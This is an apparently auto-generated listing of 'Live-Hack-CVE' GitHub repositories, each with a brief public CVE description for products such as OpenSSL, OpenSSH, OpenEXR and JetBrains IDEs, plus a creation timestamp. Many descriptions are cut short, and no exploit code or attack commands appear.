**Alpine before 2.25 allows remote attackers to cause a denial of service (application crash) when LIST or LSUB is sent before STARTTLS. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-46853](https://github.com/Live-Hack-CVE/CVE-2021-46853) create time: 2022-12-27T18:54:37Z

**The basic framework and setting module have defects, which were introduced during the design. Successful exploitation of this vulnerability may affect system integrity. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-46741](https://github.com/Live-Hack-CVE/CVE-2021-46741) create time: 2022-12-27T18:54:21Z

**In logback version 1.2.7 and prior versions, an attacker with the required privileges to edit configurations files could craft a malicious configuration allowing to execute arbitrary code loaded from LDAP servers. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-42550](https://github.com/Live-Hack-CVE/CVE-2021-42550) create time: 2022-12-27T18:54:02Z

**Heap/stack buffer overflow in the dlang_lname function in d-demangle.c in libiberty allows attackers to potentially cause a denial of service (segmentation fault and crash) via a crafted mangled symbol. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3826](https://github.com/Live-Hack-CVE/CVE-2021-3826) create time: 2022-12-27T18:53:58Z

**There's a flaw in OpenEXR's deep tile sample size calculations in versions before 3.0.0-beta. An attacker who is able to submit a crafted file to be processed by OpenEXR could trigger an integer overflow, subsequently leading to an out-of-bounds read. The greatest risk of this flaw is to application availability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3477](https://github.com/Live-Hack-CVE/CVE-2021-3477) create time: 2022-12-27T18:53:11Z

**There's a flaw in OpenEXR's Scanline API functionality in versions before 3.0.0-beta. An attacker who is able to submit a crafted file to be processed by OpenEXR could trigger excessive consumption of memory, resulting in an impact to system availability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3479](https://github.com/Live-Hack-CVE/CVE-2021-3479) create time: 2022-12-27T18:53:07Z

**A flaw was found in OpenEXR in versions before 3.0.0-beta. A crafted input file supplied by an attacker, that is processed by the Dwa decompression functionality of OpenEXR's IlmImf library, could cause a NULL pointer dereference. The highest threat from this vulnerability is to system availability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-20296](https://github.com/Live-Hack-CVE/CVE-2021-20296) create time: 2022-12-27T18:53:04Z

**There's a flaw in OpenEXR's scanline input file functionality in versions before 3.0.0-beta. An attacker able to submit a crafted file to be processed by OpenEXR could consume excessive system memory. The greatest impact of this flaw is to system availability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3478](https://github.com/Live-Hack-CVE/CVE-2021-3478) create time: 2022-12-27T18:53:00Z

**A flaw was found in OpenEXR's Multipart input file functionality. A crafted multi-part input file with no actual parts can trigger a NULL pointer dereference. The highest threat from this vulnerability is to system availability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-20299](https://github.com/Live-Hack-CVE/CVE-2021-20299) create time: 2022-12-27T18:52:46Z

**A flaw was found in OpenEXR's TiledInputFile functionality. This flaw allows an attacker who can submit a crafted single-part non-image to be processed by OpenEXR, to trigger a floating-point exception error. The highest threat from this vulnerability is to system availability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-20302](https://github.com/Live-Hack-CVE/CVE-2021-20302) create time: 2022-12-27T18:52:17Z

**A flaw was found in OpenEXR's hufUncompress functionality in OpenEXR/IlmImf/ImfHuf.cpp. This flaw allows an attacker who can submit a crafted file that is processed by OpenEXR, to trigger an integer overflow. The highest threat from this vulnerability is to system availability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-20300](https://github.com/Live-Hack-CVE/CVE-2021-20300) create time: 2022-12-27T18:52:13Z

**A flaw found in function dataWindowForTile() of IlmImf/ImfTiledMisc.cpp. An attacker who is able to submit a crafted file to be processed by OpenEXR could trigger an integer overflow, leading to an out-of-bounds write on the heap. The greatest impact of this flaw is to application availability, with some potential impa CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-20303](https://github.com/Live-Hack-CVE/CVE-2021-20303) create time: 2022-12-27T18:52:06Z

**A flaw was found in OpenEXR's B44Compressor. This flaw allows an attacker who can submit a crafted file to be processed by OpenEXR, to exhaust all memory accessible to the application. The highest threat from this vulnerability is to system availability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-20298](https://github.com/Live-Hack-CVE/CVE-2021-20298) create time: 2022-12-27T18:52:03Z

**A flaw was found in Undertow that tripped the client-side invocation timeout with certain calls made over HTTP2. This flaw allows an attacker to carry out denial of service attacks. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3859](https://github.com/Live-Hack-CVE/CVE-2021-3859) create time: 2022-12-27T18:51:56Z

**Improper handling of insufficient permissions vulnerability in setSecureFolderPolicy in PersonaManagerService prior to Android T(13) allows local attackers to set some setting value in Secure folder. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39912](https://github.com/Live-Hack-CVE/CVE-2022-39912) create time: 2022-12-27T19:01:33Z

**Exposure of Sensitive Information from an Unauthorized Actor vulnerability in Samsung DisplayManagerService prior to Android T(13) allows local attacker to access connected DLNA device information. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39914](https://github.com/Live-Hack-CVE/CVE-2022-39914) create time: 2022-12-27T19:01:30Z

**Exposure of Sensitive Information to an Unauthorized Actor in Persona Manager prior to Android T(13) allows local attacker to access user profiles information. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39913](https://github.com/Live-Hack-CVE/CVE-2022-39913) create time: 2022-12-27T19:01:25Z

**Improper access control vulnerability in Calendar prior to versions 11.6.08.0 in Android Q(10), 12.2.11.3000 in Android R(11), 12.3.07.2000 in Android S(12), and 12.4.02.0 in Android T(13) allows attackers to access sensitive information via implicit intent. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39915](https://github.com/Live-Hack-CVE/CVE-2022-39915) create time: 2022-12-27T19:01:21Z

**Brocade SANnav before v2.2.1 logs usernames and encoded passwords in debug-enabled logs. The vulnerability could allow an attacker with admin privilege to read sensitive information. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-33187](https://github.com/Live-Hack-CVE/CVE-2022-33187) create time: 2022-12-27T19:01:17Z

**In JetBrains TeamCity between 2022.10 and 2022.10.1 connecting to AWS using the "Default Credential Provider Chain" allowed TeamCity project administrators to access AWS resources normally limited to TeamCity system administrators. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46831](https://github.com/Live-Hack-CVE/CVE-2022-46831) create time: 2022-12-27T19:01:07Z

**In JetBrains TeamCity between 2022.10 and 2022.10.1 a custom STS endpoint allowed internal port scanning. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46830](https://github.com/Live-Hack-CVE/CVE-2022-46830) create time: 2022-12-27T19:01:03Z

**In JetBrains JetBrains Gateway before 2022.3 a client could connect without a valid token if the host consented. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46829](https://github.com/Live-Hack-CVE/CVE-2022-46829) create time: 2022-12-27T19:01:00Z

**In JetBrains IntelliJ IDEA before 2022.3 a DYLIB injection on macOS was possible. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46828](https://github.com/Live-Hack-CVE/CVE-2022-46828) create time: 2022-12-27T19:00:56Z

**In JetBrains IntelliJ IDEA before 2022.3 an XXE attack leading to SSRF via requests to custom plugin repositories was possible. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46827](https://github.com/Live-Hack-CVE/CVE-2022-46827) create time: 2022-12-27T19:00:53Z

**In JetBrains IntelliJ IDEA before 2022.3 the built-in web server allowed an arbitrary file to be read by exploiting a path traversal vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46826](https://github.com/Live-Hack-CVE/CVE-2022-46826) create time: 2022-12-27T19:00:48Z

**qubes-mirage-firewall (aka Mirage firewall for QubesOS) 0.8.x through 0.8.3 allows guest OS users to cause a denial of service (CPU consumption and loss of forwarding) via a crafted multicast UDP packet (IP address range of 224.0.0.0 through 239.255.255.255). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46770](https://github.com/Live-Hack-CVE/CVE-2022-46770) create time: 2022-12-27T19:00:44Z

**In JetBrains IntelliJ IDEA before 2022.3 the built-in web server leaked information about open projects. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46825](https://github.com/Live-Hack-CVE/CVE-2022-46825) create time: 2022-12-27T19:00:40Z

**In JetBrains IntelliJ IDEA before 2022.2.4 a buffer overflow in the fsnotifier daemon on macOS was possible. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46824](https://github.com/Live-Hack-CVE/CVE-2022-46824) create time: 2022-12-27T19:00:36Z

**Teleport v3.2.2, Teleport v3.5.6-rc6, and Teleport v3.6.3-b2 was discovered to contain an information leak via the /user/get-role-list web interface. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38599](https://github.com/Live-Hack-CVE/CVE-2022-38599) create time: 2022-12-27T19:00:32Z

**OpenHarmony-v3.1.2 and prior versions had a vulnerability that telephony in communication subsystem sends public events with personal data, but the permission is not set. Malicious apps could listen to public events and obtain information such as mobile numbers and SMS data without permissions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45118](https://github.com/Live-Hack-CVE/CVE-2022-45118) create time: 2022-12-27T19:00:28Z

**Rapid7 Nexpose and InsightVM versions prior to 6.6.172 failed to reliably validate the authenticity of update contents. This failure could allow an attacker to provide a malicious update and alter the functionality of Rapid7 Nexpose. The attacker would need some pre-existing mechanism to provide a malicious update, eit CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4261](https://github.com/Live-Hack-CVE/CVE-2022-4261) create time: 2022-12-27T19:00:23Z

**There is an error in the condition of the last if-statement in the function smp_check_keys. It was rejecting current keys if all requirements were unmet. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2993](https://github.com/Live-Hack-CVE/CVE-2022-2993) create time: 2022-12-27T18:59:55Z

**Weak reset token generation in SeedDMS v6.0.20 and v5.1.7 allows attackers to execute a full account takeover via a brute force attack. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44938](https://github.com/Live-Hack-CVE/CVE-2022-44938) create time: 2022-12-27T18:59:51Z

**The aswjsflt.dll library from Avast Antivirus windows contained a potentially exploitable heap corruption vulnerability that could enable an attacker to bypass the sandbox of the application it was loaded into, if applicable. This issue was fixed in version 18.0.1478 of the Script Shield Component. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4291](https://github.com/Live-Hack-CVE/CVE-2022-4291) create time: 2022-12-27T18:59:48Z

**A vulnerability has been found in LinZhaoguan pb-cms 2.0 and classified as problematic. Affected by this vulnerability is the function IpUtil.getIpAddr. The manipulation leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-2 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4353](https://github.com/Live-Hack-CVE/CVE-2022-4353) create time: 2022-12-27T18:59:44Z

**Improper authentication vulnerability in Samsung WindowManagerService prior to SMR Dec-2022 Release 1 allows attacker to send the input event using S Pen gesture. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39899](https://github.com/Live-Hack-CVE/CVE-2022-39899) create time: 2022-12-27T18:59:40Z

**This CVE is not valid. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45119](https://github.com/Live-Hack-CVE/CVE-2022-45119) create time: 2022-12-27T18:59:37Z

**This CVE is not valid. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43503](https://github.com/Live-Hack-CVE/CVE-2022-43503) create time: 2022-12-27T18:59:33Z

**Improper access control vulnerability in Nice Catch prior to SMR Dec-2022 Release 1 allows physical attackers to access contents of all toast generated in the application installed in Secure Folder through Nice Catch. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39900](https://github.com/Live-Hack-CVE/CVE-2022-39900) create time: 2022-12-27T18:59:30Z

**Kbase Doc v1.0 was discovered to contain an arbitrary file deletion vulnerability via the component /web/IndexController.java. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45290](https://github.com/Live-Hack-CVE/CVE-2022-45290) create time: 2022-12-27T18:59:26Z

**In BAOTA linux panel there exists a stored xss vulnerability attackers can use to obtain sensitive information via the log analysis feature. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4336](https://github.com/Live-Hack-CVE/CVE-2022-4336) create time: 2022-12-27T18:59:22Z

**IBM Cloud Transformation Advisor 2.0.1 through 3.3.1 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 237214. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41299](https://github.com/Live-Hack-CVE/CVE-2022-41299) create time: 2022-12-27T18:59:19Z

**The rxvt-unicode package is vulnerable to a remote code execution, in the Perl background extension, when an attacker can control the data written to the user's terminal and certain options are set. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4170](https://github.com/Live-Hack-CVE/CVE-2022-4170) create time: 2022-12-27T18:59:15Z

**Insufficiently Protected Credentials vulnerability in the remote backups application on Western Digital My Cloud devices that could allow an attacker who has gained access to a relevant endpoint to use that information to access protected data. This issue affects: Western Digital My Cloud My Cloud versions prior to 5.2 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-29839](https://github.com/Live-Hack-CVE/CVE-2022-29839) create time: 2022-12-27T18:59:12Z

**The TCP implementation in (1) Linux, (2) platforms based on BSD Unix, (3) Microsoft Windows, (4) Cisco products, and probably other operating systems allows remote attackers to cause a denial of service (connection queue exhaustion) via multiple vectors that manipulate information in the TCP state table, as demonstrate CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2008-4609](https://github.com/Live-Hack-CVE/CVE-2008-4609) create time: 2022-12-27T17:27:00Z

**Directory traversal vulnerability in the iF surfALERT (com_if_surfalert) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2010-1717](https://github.com/Live-Hack-CVE/CVE-2010-1717) create time: 2022-12-27T18:13:20Z

**Stack-based buffer overflow in the GeneratePassword function in dsmtca (aka the Trusted Communications Agent or TCA) in the backup-archive client in IBM Tivoli Storage Manager (TSM) 5.3.x before 5.3.6.10, 5.4.x before 5.4.3.4, 5.5.x before 5.5.2.10, and 6.1.x before 6.1.3.1 on Unix and Linux allows local users to gain CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2010-4604](https://github.com/Live-Hack-CVE/CVE-2010-4604) create time: 2022-12-27T17:33:03Z

**Unspecified vulnerability in the Space Management client in the Hierarchical Storage Management (HSM) component in IBM Tivoli Storage Manager (TSM) 5.4.x before 5.4.3.4, 5.5.x before 5.5.3, 6.1.x before 6.1.4, and 6.2.x before 6.2.2 on Unix and Linux allows remote attackers to execute arbitrary commands via unknown vec CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2010-4606](https://github.com/Live-Hack-CVE/CVE-2010-4606) create time: 2022-12-27T17:32:49Z

**vmware-mount in VMware Workstation 7.x before 7.1.2 build 301548 on Linux, VMware Player 3.1.x before 3.1.2 build 301548 on Linux, VMware Server 2.0.2 on Linux, and VMware Fusion 3.1.x before 3.1.2 build 332101 does not properly load libraries, which allows host OS users to gain privileges via vectors involving shared CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2010-4296](https://github.com/Live-Hack-CVE/CVE-2010-4296) create time: 2022-12-27T17:26:52Z

**Race condition in the mounting process in vmware-mount in VMware Workstation 7.x before 7.1.2 build 301548 on Linux, VMware Player 3.1.x before 3.1.2 build 301548 on Linux, VMware Server 2.0.2 on Linux, and VMware Fusion 3.1.x before 3.1.2 build 332101 allows host OS users to gain privileges via vectors involving tempo CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2010-4295](https://github.com/Live-Hack-CVE/CVE-2010-4295) create time: 2022-12-27T17:26:48Z

**Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 update 4 and earlier, 6 update 32 and earlier, 5 update 35 and earlier, and 1.4.2_37 and earlier allows local users to affect confidentiality via unknown vectors related to printing on Solaris or Linux. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2012-1717](https://github.com/Live-Hack-CVE/CVE-2012-1717) create time: 2022-12-27T18:11:05Z

**The sfc (aka Solarflare Solarstorm) driver in the Linux kernel before 3.2.30 allows remote attackers to cause a denial of service (DMA descriptor consumption and network-controller outage) via crafted TCP packets that trigger a small MSS value. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2012-3412](https://github.com/Live-Hack-CVE/CVE-2012-3412) create time: 2022-12-27T18:11:01Z

**IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.47, 7.0 before 7.0.0.29, 8.0 before 8.0.0.6, and 8.5 before 8.5.0.2 on Linux, Solaris, and HP-UX, when a Local OS registry is used, does not properly validate user accounts, which allows remote attackers to bypass intended access restrictions via unspecified vecto CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-0543](https://github.com/Live-Hack-CVE/CVE-2013-0543) create time: 2022-12-27T17:34:24Z

**Directory traversal vulnerability in the Administrative Console in IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.47, 7.0 before 7.0.0.29, 8.0 before 8.0.0.6, and 8.5 before 8.5.0.2 on Linux and UNIX allows remote authenticated users to modify data via unspecified vectors. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-0544](https://github.com/Live-Hack-CVE/CVE-2013-0544) create time: 2022-12-27T17:34:14Z

**The dtls1_clear_queues function in ssl/d1_lib.c in OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h frees data structures without considering that application data can arrive between a ChangeCipherSpec message and a Finished message, which allows remote DTLS peers to cause a denial of service (memor CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-8176](https://github.com/Live-Hack-CVE/CVE-2014-8176) create time: 2022-12-27T18:16:16Z

**In multiple functions of AvatarPhotoController.java, there is a possible access to content owned by system content providers due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20144](https://github.com/Live-Hack-CVE/CVE-2022-20144) create time: 2022-12-27T18:09:13Z

**The ASN.1 signature-verification implementation in the rsa_item_verify function in crypto/rsa/rsa_ameth.c in OpenSSL 1.0.2 before 1.0.2a allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via crafted RSA PSS parameters to an endpoint that uses the certificate-verificat CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-0208](https://github.com/Live-Hack-CVE/CVE-2015-0208) create time: 2022-12-27T18:20:02Z

**Use-after-free vulnerability in the d2i_ECPrivateKey function in crypto/ec/ec_asn1.c in OpenSSL before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a might allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly have unspecified other impact CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-0209](https://github.com/Live-Hack-CVE/CVE-2015-0209) create time: 2022-12-27T18:19:58Z

**The sigalgs implementation in t1_lib.c in OpenSSL 1.0.2 before 1.0.2a allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) by using an invalid signature_algorithms extension in the ClientHello message during a renegotiation. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-0291](https://github.com/Live-Hack-CVE/CVE-2015-0291) create time: 2022-12-27T18:19:48Z

**The X509_cmp_time function in crypto/x509/x509_vfy.c in OpenSSL before 0.9.8zg, 1.0.0 before 1.0.0s, 1.0.1 before 1.0.1n, and 1.0.2 before 1.0.2b allows remote attackers to cause a denial of service (out-of-bounds read and application crash) via a crafted length field in ASN1_TIME data, as demonstrated by an attack aga CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-1789](https://github.com/Live-Hack-CVE/CVE-2015-1789) create time: 2022-12-27T18:19:19Z

**The do_free_upto function in crypto/cms/cms_smime.c in OpenSSL before 0.9.8zg, 1.0.0 before 1.0.0s, 1.0.1 before 1.0.1n, and 1.0.2 before 1.0.2b allows remote attackers to cause a denial of service (infinite loop) via vectors that trigger a NULL value of a BIO data structure, as demonstrated by an unrecognized X.660 OI CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-1792](https://github.com/Live-Hack-CVE/CVE-2015-1792) create time: 2022-12-27T18:19:15Z

**The BN_GF2m_mod_inv function in crypto/bn/bn_gf2m.c in OpenSSL before 0.9.8s, 1.0.0 before 1.0.0e, 1.0.1 before 1.0.1n, and 1.0.2 before 1.0.2b does not properly handle ECParameters structures in which the curve is over a malformed binary polynomial field, which allows remote attackers to cause a denial of service (inf CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-1788](https://github.com/Live-Hack-CVE/CVE-2015-1788) create time: 2022-12-27T18:19:11Z

**The ssl3_get_key_exchange function in ssl/s3_clnt.c in OpenSSL 1.0.2 before 1.0.2e allows remote servers to cause a denial of service (segmentation fault) via a zero p value in an anonymous Diffie-Hellman (DH) ServerKeyExchange message. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-1794](https://github.com/Live-Hack-CVE/CVE-2015-1794) create time: 2022-12-27T18:19:08Z

**Race condition in the ssl3_get_new_session_ticket function in ssl/s3_clnt.c in OpenSSL before 0.9.8zg, 1.0.0 before 1.0.0s, 1.0.1 before 1.0.1n, and 1.0.2 before 1.0.2b, when used for a multi-threaded client, allows remote attackers to cause a denial of service (double free and application crash) or possibly have unspe CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-1791](https://github.com/Live-Hack-CVE/CVE-2015-1791) create time: 2022-12-27T18:19:05Z

**The PKCS7_dataDecodefunction in crypto/pkcs7/pk7_doit.c in OpenSSL before 0.9.8zg, 1.0.0 before 1.0.0s, 1.0.1 before 1.0.1n, and 1.0.2 before 1.0.2b allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a PKCS#7 blob that uses ASN.1 encoding and lacks inner EncryptedC CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-1790](https://github.com/Live-Hack-CVE/CVE-2015-1790) create time: 2022-12-27T18:19:01Z

**The ssl3_get_client_key_exchange function in s3_srvr.c in OpenSSL 1.0.2 before 1.0.2a, when client authentication and an ephemeral Diffie-Hellman ciphersuite are enabled, allows remote attackers to cause a denial of service (daemon crash) via a ClientKeyExchange message with a length of zero. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-1787](https://github.com/Live-Hack-CVE/CVE-2015-1787) create time: 2022-12-27T18:18:36Z

**The ASN1_TFLG_COMBINE implementation in crypto/asn1/tasn_dec.c in OpenSSL before 0.9.8zh, 1.0.0 before 1.0.0t, 1.0.1 before 1.0.1q, and 1.0.2 before 1.0.2e mishandles errors caused by malformed X509_ATTRIBUTE data, which allows remote attackers to obtain sensitive information from process memory by triggering a decodin CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-3195](https://github.com/Live-Hack-CVE/CVE-2015-3195) create time: 2022-12-27T18:18:32Z

**ssl/s2_srvr.c in OpenSSL 1.0.1 before 1.0.1r and 1.0.2 before 1.0.2f does not prevent use of disabled ciphers, which makes it easier for man-in-the-middle attackers to defeat cryptographic protection mechanisms by performing computations on SSLv2 traffic, related to the get_client_master_key and get_client_hello functi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-3197](https://github.com/Live-Hack-CVE/CVE-2015-3197) create time: 2022-12-27T18:18:21Z

**The Montgomery squaring implementation in crypto/bn/asm/x86_64-mont5.pl in OpenSSL 1.0.2 before 1.0.2e on the x86_64 platform, as used by the BN_mod_exp function, mishandles carry propagation and produces incorrect output, which makes it easier for remote attackers to obtain sensitive private-key information via an att CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-3193](https://github.com/Live-Hack-CVE/CVE-2015-3193) create time: 2022-12-27T18:18:14Z

**ssl/s3_clnt.c in OpenSSL 1.0.0 before 1.0.0t, 1.0.1 before 1.0.1p, and 1.0.2 before 1.0.2d, when used for a multi-threaded client, writes the PSK identity hint to an incorrect data structure, which allows remote servers to cause a denial of service (race condition and double free) via a crafted ServerKeyExchange messag CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-3196](https://github.com/Live-Hack-CVE/CVE-2015-3196) create time: 2022-12-27T18:18:04Z

**The x11_open_helper function in channels.c in ssh in OpenSSH before 6.9, when ForwardX11Trusted mode is not used, lacks a check of the refusal deadline for X connections, which makes it easier for remote attackers to bypass intended access restrictions via a connection outside of the permitted time window. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-5352](https://github.com/Live-Hack-CVE/CVE-2015-5352) create time: 2022-12-27T18:17:36Z

**crypto/rsa/rsa_ameth.c in OpenSSL 1.0.1 before 1.0.1q and 1.0.2 before 1.0.2e allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via an RSA PSS ASN.1 signature that lacks a mask generation function parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-3194](https://github.com/Live-Hack-CVE/CVE-2015-3194) create time: 2022-12-27T18:17:26Z

**The kbdint_next_device function in auth2-chall.c in sshd in OpenSSH through 6.9 does not properly restrict the processing of keyboard-interactive devices within a single connection, which makes it easier for remote attackers to conduct brute-force attacks or cause a denial of service (CPU consumption) via a long and du CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-5600](https://github.com/Live-Hack-CVE/CVE-2015-5600) create time: 2022-12-27T18:16:48Z

**The TLS protocol 1.2 and earlier, when a DHE_EXPORT ciphersuite is enabled on a server but not on a client, does not properly convey a DHE_EXPORT choice, which allows man-in-the-middle attackers to conduct cipher-downgrade attacks by rewriting a ClientHello with DHE replaced by DHE_EXPORT and then rewriting a ServerHel CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-4000](https://github.com/Live-Hack-CVE/CVE-2015-4000) create time: 2022-12-27T18:16:44Z

**The SNAP Lite component in certain SISCO MMS-EASE and AX-S4 ICCP products allows remote attackers to cause a denial of service (CPU consumption) via a crafted packet. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-6574](https://github.com/Live-Hack-CVE/CVE-2015-6574) create time: 2022-12-27T18:16:39Z

**sshd in OpenSSH 6.8 and 6.9 uses world-writable permissions for TTY devices, which allows local users to cause a denial of service (terminal disruption) or possibly have unspecified other impact by writing to a device, as demonstrated by writing an escape sequence. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-6565](https://github.com/Live-Hack-CVE/CVE-2015-6565) create time: 2022-12-27T18:16:36Z

**Use-after-free vulnerability in the mm_answer_pam_free_ctx function in monitor.c in sshd in OpenSSH before 7.0 on non-OpenBSD platforms might allow local users to gain privileges by leveraging control of the sshd uid to send an unexpectedly early MONITOR_REQ_PAM_FREE_CTX request. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-6564](https://github.com/Live-Hack-CVE/CVE-2015-6564) create time: 2022-12-27T18:16:29Z

**The monitor component in sshd in OpenSSH before 7.0 on non-OpenBSD platforms accepts extraneous username data in MONITOR_REQ_PAM_INIT_CTX requests, which allows local users to conduct impersonation attacks by leveraging any SSH login access in conjunction with control of the sshd uid to send a crafted MONITOR_REQ_PWNAM CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-6563](https://github.com/Live-Hack-CVE/CVE-2015-6563) create time: 2022-12-27T18:16:26Z

**The do_setup_env function in session.c in sshd in OpenSSH through 7.2p2, when the UseLogin feature is enabled and PAM is configured to read .pam_environment files in user home directories, allows local users to gain privileges by triggering a crafted environment for the /bin/login program, as demonstrated by an LD_PREL CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-8325](https://github.com/Live-Hack-CVE/CVE-2015-8325) create time: 2022-12-27T18:16:23Z

**The (1) roaming_read and (2) roaming_write functions in roaming_common.c in the client in OpenSSH 5.x, 6.x, and 7.x before 7.1p2, when certain proxy and forward options are enabled, do not properly maintain connection file descriptors, which allows remote servers to cause a denial of service (heap-based buffer overflow CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-0778](https://github.com/Live-Hack-CVE/CVE-2016-0778) create time: 2022-12-27T18:19:55Z

**Multiple integer overflows in OpenSSL 1.0.1 before 1.0.1s and 1.0.2 before 1.0.2g allow remote attackers to cause a denial of service (heap memory corruption or NULL pointer dereference) or possibly have unspecified other impact via a long digit string that is mishandled by the (1) BN_dec2bn or (2) BN_hex2bn function, CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-0797](https://github.com/Live-Hack-CVE/CVE-2016-0797) create time: 2022-12-27T18:19:52Z

**authfile.c in sshd in OpenSSH before 7.4 does not properly consider the effects of realloc on buffer contents, which might allow local users to obtain sensitive private-key information by leveraging access to a privilege-separated child process. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-10011](https://github.com/Live-Hack-CVE/CVE-2016-10011) create time: 2022-12-27T18:19:45Z

**The resend_bytes function in roaming_common.c in the client in OpenSSH 5.x, 6.x, and 7.x before 7.1p2 allows remote servers to obtain sensitive information from process memory by requesting transmission of an entire buffer, as demonstrated by reading a private key. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-0777](https://github.com/Live-Hack-CVE/CVE-2016-0777) create time: 2022-12-27T18:19:41Z

